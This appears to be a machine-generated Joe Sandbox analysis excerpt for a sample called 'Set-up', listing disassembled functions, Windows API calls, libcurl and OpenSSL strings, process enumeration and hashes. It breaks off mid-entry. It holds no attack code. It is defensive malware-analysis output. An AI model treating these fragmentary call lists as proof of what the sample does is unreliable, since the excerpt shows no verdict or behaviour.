                                • Opcode ID: fd1e0fd90eee1459b6bdedaabf90a5fbe6d8051a4d858fde47008c49bef4e895
                                • Instruction ID: f133e657bb255a9bbec497ee78849d820744d31e168e514c81c6c63131676a73
                                • Opcode Fuzzy Hash: fd1e0fd90eee1459b6bdedaabf90a5fbe6d8051a4d858fde47008c49bef4e895
                                • Instruction Fuzzy Hash: 80B1C170604305AFD710CF24C885BAABBE1EF55328F048529FC599B2E2DB70EC59CB61

                                Control-flow Graph

                                APIs
                                • send.WS2_32(multi.c,?,?,?), ref: 001176DE
                                • send.WS2_32(multi.c,?,?,?), ref: 001176EA
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00117721
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00117745
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011774D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: send$__acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                • API String ID: 3540913164-3388739168
                                • Opcode ID: d70bd25fe905a51ff82916103480c15c81efdb2d42cc972b62a504975dee3009
                                • Instruction ID: 5c59a24f9290d8819e1fbbc21ce3fc87c70e8b908ec3bf84b85fc31c7a6204c4
                                • Opcode Fuzzy Hash: d70bd25fe905a51ff82916103480c15c81efdb2d42cc972b62a504975dee3009
                                • Instruction Fuzzy Hash: 1E112BB590D394AFE114AB159C49D673B7DEBC2B68F050928F80863391DB719C40C7B1

                                Control-flow Graph

                                control_flow_graph 1335 2947b0-2947bf call 2ee5d0 1337 2947c4-2947dd strchr 1335->1337 1338 2947df-2947f2 call 28d520 1337->1338 1339 294824-29485e call 2c7120 call 2c7220 GetLastError call 2c7310 _errno 1337->1339 1344 2947f8-29481f call 28d690 call 28df50 1338->1344 1345 29488d-294896 fclose 1338->1345 1356 29486b-29488b call 2c7120 call 2c7220 1339->1356 1357 294860-294869 _errno 1339->1357 1352 2948c4-2948cb 1344->1352 1348 2948c2 1345->1348 1348->1352 1366 2948b8-2948bf call 2c7310 1356->1366 1357->1356 1359 294898-2948b3 call 2c7120 call 2c7220 1357->1359 1359->1366 1366->1348
                                APIs
                                  • Part of subcall function 002EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE5E2
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE5FA
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 002EE637
                                  • Part of subcall function 002EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0027A31E), ref: 002EE64D
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0027A31E,00000001,?,00000008,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000), ref: 002EE665
                                  • Part of subcall function 002EE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE678
                                  • Part of subcall function 002EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE685
                                  • Part of subcall function 002EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE690
                                  • Part of subcall function 002EE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E), ref: 002EE6A6
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00747B34), ref: 002947CC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00747B34), ref: 0029483D
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00747B34), ref: 00294855
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00747B34), ref: 00294860
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00747B34), ref: 0029488E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                                • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                                • API String ID: 3063597995-203430365
                                • Opcode ID: 9665eb1cb9367036a26055699c1710966f1b995df39463d113b2d8dc8e551b5d
                                • Instruction ID: 1c515a9dd71dc34f9a453451951a0234ce25f306df7d3796fbfedb42b315d7ab
                                • Opcode Fuzzy Hash: 9665eb1cb9367036a26055699c1710966f1b995df39463d113b2d8dc8e551b5d
                                • Instruction Fuzzy Hash: 5321C5E5BE53417BE52036613C07F1B3A489B62B99F090128FA09652C3EA9969358DB3


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                                • API String ID: 420147892-2059488242
                                • Opcode ID: e55e2ab02c353fdc7afba9f964aba512da88e284d97cd36ea04e87de40655b9f
                                • Instruction ID: a444e7a6ee388bc1ef914dfc5e14bb3d9fe8abef1103cfae938f1e6e83c50a43
                                • Opcode Fuzzy Hash: e55e2ab02c353fdc7afba9f964aba512da88e284d97cd36ea04e87de40655b9f
                                • Instruction Fuzzy Hash: 0231B4B09053189FCB40EFB8D58569EBBF1AF44304F01896DE899E7341EB349A84CF92

                                Control-flow Graph

                                control_flow_graph 1394 117770-11778e 1395 117790-117797 1394->1395 1396 1177b6-1177c2 recv 1394->1396 1395->1396 1397 117799-1177a1 1395->1397 1398 1177c4-1177d9 call 1172a0 1396->1398 1399 11782e-117832 1396->1399 1400 1177a3-1177b4 recv 1397->1400 1401 1177db-117829 call 1172a0 __acrt_iob_func call 11cb20 fflush _errno 1397->1401 1398->1399 1400->1398 1401->1399
                                APIs
                                • recv.WS2_32(?,?,001494BF,?), ref: 001177AE
                                • recv.WS2_32(?,?,001494BF,?), ref: 001177BA
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 001177F1
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00117815
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011781D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: recv$__acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                • API String ID: 2542159810-640788491
                                • Opcode ID: 06071abef6728305a774704deac1d1514e799be07da9adbafb1180bf754db78f
                                • Instruction ID: b570f905c47cdcfcd3925fbeb04fbb33509c865a346027665c02b49eb48f3091
                                • Opcode Fuzzy Hash: 06071abef6728305a774704deac1d1514e799be07da9adbafb1180bf754db78f
                                • Instruction Fuzzy Hash: FC1108B5909394AFD114AB159C4DD673B6DEBC6B68F050A28F908633D1D7719C40C6F1
                                APIs
                                • socket.WS2_32(?,?,?), ref: 00117618
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00117659
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0011767D
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00117685
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: __acrt_iob_func_errnofflushsocket
                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                • API String ID: 166263346-842387772
                                • Opcode ID: 4807b7593a6f9434a60f56110e6f229566716103763822acc9a82844db8141d8
                                • Instruction ID: 8910d2ad258e673ecd573453ddf3e7a2005abf9f8d7a7d8435b5997eb16078fe
                                • Opcode Fuzzy Hash: 4807b7593a6f9434a60f56110e6f229566716103763822acc9a82844db8141d8
                                • Instruction Fuzzy Hash: 44115C326096916FD6102B29AC06E873B69EFC1724F050524F804A33E1D7358C90C7D1
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0049D1E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _errno
                                • String ID: @$Inf$NaN
                                • API String ID: 2918714741-141429178
                                • Opcode ID: b6351563307c2715920716855d317cfce86c50102a939ee5d498946dce6bf20c
                                • Instruction ID: a7d0149f2a89ef0b70581f3ed079e1337843c3fbc936cacd11c5ef53390c4473
                                • Opcode Fuzzy Hash: b6351563307c2715920716855d317cfce86c50102a939ee5d498946dce6bf20c
                                • Instruction Fuzzy Hash: 68F19174A0C3858BDB319F24C4407ABBFE1BB85314F158A6ED9DD87381D7399906CB8A
                                APIs
                                • htonl.WS2_32(7F000001), ref: 001C4A21
                                • gethostname.WS2_32(00000000,00000040), ref: 001C4AA4
                                • WSAGetLastError.WS2_32 ref: 001C4AB3
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 001C4B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: ErrorLastgethostnamehtonlstrchr
                                • String ID: xc$|c
                                • API String ID: 655544046-3962473566
                                • Opcode ID: 9071436e96528c57824f6a35eac8ca557717452cbc3179863265c60cc4c631f4
                                • Instruction ID: 091778695e24e7f4330eb2d0c100981685f0b3b77225c9a9367df0137fdeb603
                                • Opcode Fuzzy Hash: 9071436e96528c57824f6a35eac8ca557717452cbc3179863265c60cc4c631f4
                                • Instruction Fuzzy Hash: 3951D0706087018FE7309B65DD59B237AE4EF25319F14093CE98A866D1E779EC44CB02
                                APIs
                                  • Part of subcall function 001176A0: send.WS2_32(multi.c,?,?,?), ref: 001176DE
                                • WSAGetLastError.WS2_32 ref: 001493C3
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0014935C
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00149388
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                • API String ID: 1798382672-2691795271
                                • Opcode ID: a050023e08f69475f2fd7b387fbabc03b88b338f8898877d35b5630c6d71a0a1
                                • Instruction ID: 4b9e6c70ecca8dc6f2a9a222c59a17cd0a6cc8a3527cb97a6c6d4fbefa4072a7
                                • Opcode Fuzzy Hash: a050023e08f69475f2fd7b387fbabc03b88b338f8898877d35b5630c6d71a0a1
                                • Instruction Fuzzy Hash: 6A51D174A00305AFD714DF24C881FABB7A5FF85314F188629FD588B2A2E770E991CB91
                                APIs
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00711C4D,00000000,00000000,?,?,?,001D9882,?,00000000), ref: 001D77DD
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 001D77F0
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 001D7802
                                • GetLastError.KERNEL32(?,00000000), ref: 001D780E
                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 001D7830
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 001D7843
                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001D786B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: fseek$ErrorLastfclosefopenfreadftell
                                • String ID:
                                • API String ID: 1915723720-0
                                • Opcode ID: e6777305571b90a74f09108b5eee1b6bb9da1efb633f1c51af371067a868bdd6
                                • Instruction ID: 6b5610889786187682b8a0e2e11c4470ed13125514b148553746d7f8503f650f
                                • Opcode Fuzzy Hash: e6777305571b90a74f09108b5eee1b6bb9da1efb633f1c51af371067a868bdd6
                                • Instruction Fuzzy Hash: A211D6E1E0931067FF2125265C4AB7B3948DB91369F18043EFD05D63C2FB29D804D1B6
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0014A1C6
                                • WSAGetLastError.WS2_32 ref: 0014A1D0
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D0A1
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0A9
                                  • Part of subcall function 0012D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0CD
                                  • Part of subcall function 0012D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0D7
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0012D381
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0012D3A2
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D3BF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D3C9
                                  • Part of subcall function 0012D090: SetLastError.KERNEL32(00000000), ref: 0012D3D4
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A21C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A220
                                Strings
                                • getsockname() failed with errno %d: %s, xrefs: 0014A1F0
                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0014A23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                • API String ID: 2076026050-2605427207
                                • Opcode ID: 6f85b9c5a46e3dd46ae1db550165d45076942d66f8f14ae7413d8fb0d7fe0614
                                • Instruction ID: 93d2adeff9d32169fcf6f35ab2c8b98aca50af2fd79bce2736308cff26650c3d
                                • Opcode Fuzzy Hash: 6f85b9c5a46e3dd46ae1db550165d45076942d66f8f14ae7413d8fb0d7fe0614
                                • Instruction Fuzzy Hash: 55210A71844280AAF7259B18EC46FE773BCEF91328F040215FD9853161FB3269898BE2
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00113BA6,?,0083C044,00111BD2), ref: 001173A6
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00113BA6,?,0083C044,00111BD2), ref: 001173CA
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00113BA6,?,0083C044,00111BD2), ref: 001173D2
                                Strings
                                Similarity
                                • API ID: __acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                                • API String ID: 4185500129-1340350808
                                • Opcode ID: 5c3433639ab0b8182779a469a7501163b3d634720d90db9b01d2c9497faabfd5
                                • Instruction ID: f85ae8e12767f31feab6a00ccaade6845e2933a0510856d599f6c2d6a68f7df2
                                • Opcode Fuzzy Hash: 5c3433639ab0b8182779a469a7501163b3d634720d90db9b01d2c9497faabfd5
                                • Instruction Fuzzy Hash: 0421CF71A09341AFD3289F15AC46E9B7BA9FF85754F05082CFC08E3391E761D84087E1
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 0012D65A
                                  • Part of subcall function 0012D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0012D5FA,iphlpapi.dll), ref: 0012D699
                                  • Part of subcall function 0012D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0012D6B5
                                  • Part of subcall function 0012D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,006ED834,?,?,0012D5FA,iphlpapi.dll), ref: 0012D6C3
                                • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0012D60C
                                • QueryPerformanceFrequency.KERNEL32(0083C070), ref: 0012D643
                                • WSACleanup.WS2_32 ref: 0012D67C
                                Strings
                                Similarity
                                • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                                • String ID: if_nametoindex$iphlpapi.dll
                                • API String ID: 3452087986-3097795196
                                • Opcode ID: 87e76fa8a6c36045f1edfd8603a1575f9f7397e945a0cd71615b85b851e5a7fd
                                • Instruction ID: 801b94b5f4d405765e4f653c71d7ed92a3ae93daff22217749d5af5cc6e64c7a
                                • Opcode Fuzzy Hash: 87e76fa8a6c36045f1edfd8603a1575f9f7397e945a0cd71615b85b851e5a7fd
                                • Instruction Fuzzy Hash: FD01A7A49007818BF711AF78FD2B3663AA0BB65304F850568E958D52D2F778C568C752
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638618
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638634
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 0063869F
                                Strings
                                Similarity
                                • API ID: calloc$free
                                • String ID:
                                • API String ID: 171065143-3916222277
                                • Opcode ID: d312d63472c40b007e0335af5b5044a91c3beefbef51af98bc2be27d366a467e
                                • Instruction ID: be9da735346b14c221e1cf7f0466086c0ea5f0b6d388a6f7a26475589d311229
                                • Opcode Fuzzy Hash: d312d63472c40b007e0335af5b5044a91c3beefbef51af98bc2be27d366a467e
                                • Instruction Fuzzy Hash: D4115EB1504B018FCB20DF29C98169ABBE1EF66314F154B2DE4A59B3D1DB34DA05CBD2
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                Similarity
                                • API ID: malloc$memcpystrlen
                                • String ID:
                                • API String ID: 3553820921-0
                                • Opcode ID: f1fc1ecd4be37fd05a555f5c10ac4a933247cfe6624eeb9dd63b2f26beeba582
                                • Instruction ID: 50a0da13c9962c9cf3b44f81494c7a920cef256188638286f878ad4e59a5b283
                                • Opcode Fuzzy Hash: f1fc1ecd4be37fd05a555f5c10ac4a933247cfe6624eeb9dd63b2f26beeba582
                                • Instruction Fuzzy Hash: 783183B5A00745CFCB28CF68D9903A9BBF1FB89304F148A2EDA48A7311D735A841CF80
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                Similarity
                                • API ID: malloc$memcpystrlen
                                • String ID:
                                • API String ID: 3553820921-0
                                • Opcode ID: 191f75de1bf03741f8fe54b46433ad2a62052344d42841e4944a58871327321f
                                • Instruction ID: 460865dfb4a5581588a02d2955f001999dab11fa696d66ba9be55ffc8e6aa3d6
                                • Opcode Fuzzy Hash: 191f75de1bf03741f8fe54b46433ad2a62052344d42841e4944a58871327321f
                                • Instruction Fuzzy Hash: 552120B5904705CFCB18DF69D9902ADBBF1FB88304F11892ED948A7310E734A941CF81
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(0083C044,0011208F), ref: 00113AB5
                                • ReleaseSRWLockExclusive.KERNEL32(0083C044,0083C044,0011208F), ref: 00113AD0
                                • ReleaseSRWLockExclusive.KERNEL32(0083C044), ref: 00113B02
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID:
                                • API String ID: 1021914862-0
                                • Opcode ID: 8b8befd3e9239604c513e2b36ecc0bdde37c2ca0e226ef04a378dd281eceb4b3
                                • Instruction ID: 2e07d9bfcb01bb6ac7c519975658cf8ba7c345f1312889852aee56e017567136
                                • Opcode Fuzzy Hash: 8b8befd3e9239604c513e2b36ecc0bdde37c2ca0e226ef04a378dd281eceb4b3
                                • Instruction Fuzzy Hash: 40E08C20600986CECE187BADBCA360B3550BFA2708F840838B114F1276EF3C88048FA6
                                APIs
                                Strings
                                Similarity
                                • API ID: CloseEvent
                                • String ID: multi.c
                                • API String ID: 2624557715-214371023
                                • Opcode ID: 284c34fa90d42fac2a2d0d4040cda20080045470bd697210ba9e717c4051fe2a
                                • Instruction ID: d7e51a96348e6a61958591d4d191003e329fe9830f1e23e2242bad44da2a0b67
                                • Opcode Fuzzy Hash: 284c34fa90d42fac2a2d0d4040cda20080045470bd697210ba9e717c4051fe2a
                                • Instruction Fuzzy Hash: 3F510BB5D043045BDB15AA30AC41BE736A4BF65318F08053CF88D9B293FB75E55AC7A2
                                APIs
                                • closesocket.WS2_32(?), ref: 001178BB
                                  • Part of subcall function 001172A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 001172F6
                                Strings
                                Similarity
                                • API ID: closesocketfwrite
                                • String ID: FD %s:%d sclose(%d)
                                • API String ID: 1967222983-3116021458
                                • Opcode ID: 1acd460febad7ba7b565af545a0b3a2042a7d7b1dd3a6a9d2c37954590ce2e07
                                • Instruction ID: 9325cc2d5e0fdd9c573283693197ee7b4bc09f3d4332d4f4e00bc097ba5ae5b3
                                • Opcode Fuzzy Hash: 1acd460febad7ba7b565af545a0b3a2042a7d7b1dd3a6a9d2c37954590ce2e07
                                • Instruction Fuzzy Hash: 35D05E32A0A2306B86206A99BC48C9F7BB8DEC6F60B090968F94467340D2309C41C7E2
                                APIs
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001C72FE
                                Similarity
                                • API ID: _stricmp
                                • String ID:
                                • API String ID: 2884411883-0
                                • Opcode ID: 4e1dfc23b3637cf59c61a96a43685d7a17cb23e98530905aab48085ee9030b21
                                • Instruction ID: 7322bba179bc242508c1d6e352d5c0251b2e80c3507efb2596060ef82b4600c7
                                • Opcode Fuzzy Hash: 4e1dfc23b3637cf59c61a96a43685d7a17cb23e98530905aab48085ee9030b21
                                • Instruction Fuzzy Hash: 0CC193B1908200ABEB10AB24DC86F6B77A9FF74304F04482DFC4556392E775ED15CB92
                                APIs
                                  • Part of subcall function 001CA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA499
                                  • Part of subcall function 001CA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA4FB
                                  • Part of subcall function 001CA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 001CAA19
                                  • Part of subcall function 001C9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,001C92A4,?,?,?,?,?,?,?,?,00000000), ref: 001C9B6E
                                  • Part of subcall function 001C9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,001C4860,00000000), ref: 001C9C24
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 001C93C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: AdaptersAddressesgetenv$Openmemcpy
                                • String ID: xc
                                • API String ID: 1905038125-3394131015
                                • Opcode ID: 313b9970003ba92da53a254bbcfac98f41fd70002454d08a6e787c54c5a44e49
                                • Instruction ID: b79642e2192b3c395f69b4ce0fe75f14a12d1e27e574609e42af7bd3350349e9
                                • Opcode Fuzzy Hash: 313b9970003ba92da53a254bbcfac98f41fd70002454d08a6e787c54c5a44e49
                                • Instruction Fuzzy Hash: 0F51D3B1904342ABD724DF24D989F2ABBE4BFA4354F08452CFC4983691E735EC65DB82
                                APIs
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,001D7438,?), ref: 001D5EB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: memmove
                                • String ID: |c
                                • API String ID: 2162964266-1070527111
                                • Opcode ID: 00d61b3e8e200b1030f283dee523ff452dabe76f33da64329de508d27fb8a651
                                • Instruction ID: 7e80a8bbdf3b6319a7108779ff15dd3522e4b151048ad212c6d9673852fc9d74
                                • Opcode Fuzzy Hash: 00d61b3e8e200b1030f283dee523ff452dabe76f33da64329de508d27fb8a651
                                • Instruction Fuzzy Hash: 6D316D756016058FC7149F2CC980665B7E6EF99318B29897ED849CF352E732ED03CB90
                                APIs
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0063906F), ref: 00638FD9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,0063906F), ref: 00638FFC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: _errnorealloc
                                • String ID:
                                • API String ID: 3650671883-0
                                • Opcode ID: 9b2238a5c0d38a65c80841ec2091fb842fae14f0e22b61294e2330806e870b04
                                • Instruction ID: c7dac32aa8825fec5ab9b15c58ffd79449b009a58b0457d09fac2ddaed5d628f
                                • Opcode Fuzzy Hash: 9b2238a5c0d38a65c80841ec2091fb842fae14f0e22b61294e2330806e870b04
                                • Instruction Fuzzy Hash: 13F06D715006118F8B109F28C8844D9B6E6BB05364F25475EF914CB396EB30D882CBD1
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,0028D471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,0028D52B,00000000,00111A70,002948ED,0074AA1C), ref: 002ECA8C
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00111A70), ref: 002ECA9E
                                Memory Dump Source
